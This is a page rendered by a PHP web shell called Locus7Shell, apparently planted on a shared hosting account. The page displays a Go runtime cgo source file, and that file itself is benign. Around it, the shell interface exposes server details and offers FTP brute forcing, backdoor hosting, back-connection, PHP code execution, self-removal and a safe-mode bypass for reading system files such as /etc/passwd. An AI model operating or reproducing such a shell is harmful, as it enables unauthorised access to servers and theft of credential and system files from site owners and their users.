Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/go/src/runtime/cgo/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     gcc_linux_amd64.c (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

#include <pthread.h>
#include <errno.h>
#include <string.h> // strerror
#include <signal.h>
#include <stdlib.h>
#include "libcgo.h"
#include "libcgo_unix.h"

static void* threadentry(void*);
static void (*setg_gcc)(void*);

// This will be set in gcc_android.c for android-specific customization.
void (*x_cgo_inittls)(void **tlsg, void **tlsbase) __attribute__((common));

void
x_cgo_init(G *g, void (*setg)(void*), void **tlsg, void **tlsbase)
{
    pthread_attr_t *attr;
    size_t size;

    /* The memory sanitizer distributed with versions of clang
       before 3.8 has a bug: if you call mmap before malloc, mmap
       may return an address that is later overwritten by the msan
       library.  Avoid this problem by forcing a call to malloc
       here, before we ever call malloc.

       This is only required for the memory sanitizer, so it's
       unfortunate that we always run it.  It should be possible
       to remove this when we no longer care about versions of
       clang before 3.8.  The test for this is
       misc/cgo/testsanitizers.

       GCC works hard to eliminate a seemingly unnecessary call to
       malloc, so we actually use the memory we allocate.  */

    setg_gcc = setg;
    attr = (pthread_attr_t*)malloc(sizeof *attr);
    if (attr == NULL) {
        fatalf("malloc failed: %s", strerror(errno));
    }
    pthread_attr_init(attr);
    pthread_attr_getstacksize(attr, &size);
    g->stacklo = (uintptr)__builtin_frame_address(0) - size + 4096;
    if (g->stacklo >= g->stackhi)
        fatalf("bad stack bounds: lo=%p hi=%p\n", g->stacklo, g->stackhi);
    pthread_attr_destroy(attr);
    free(attr);

    if (x_cgo_inittls) {
        x_cgo_inittls(tlsg, tlsbase);
    }
}


void
_cgo_sys_thread_start(ThreadStart *ts)
{
    pthread_attr_t attr;
    sigset_t ign, oset;
    pthread_t p;
    size_t size;
    int err;

    sigfillset(&ign);
    pthread_sigmask(SIG_SETMASK, &ign, &oset);

    pthread_attr_init(&attr);
    pthread_attr_getstacksize(&attr, &size);
    // Leave stacklo=0 and set stackhi=size; mstart will do the rest.
    ts->g->stackhi = size;
    err = _cgo_try_pthread_create(&p, &attr, threadentry, ts);

    pthread_sigmask(SIG_SETMASK, &oset, nil);

    if (err != 0) {
        fatalf("pthread_create failed: %s", strerror(err));
    }
}

static void*
threadentry(void *v)
{
    ThreadStart ts;

    ts = *(ThreadStart*)v;
    _cgo_tsan_acquire();
    free(v);
    _cgo_tsan_release();

    crosscall_amd64(ts.fn, setg_gcc, (void*)ts.g);
    return nil;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0055 ]--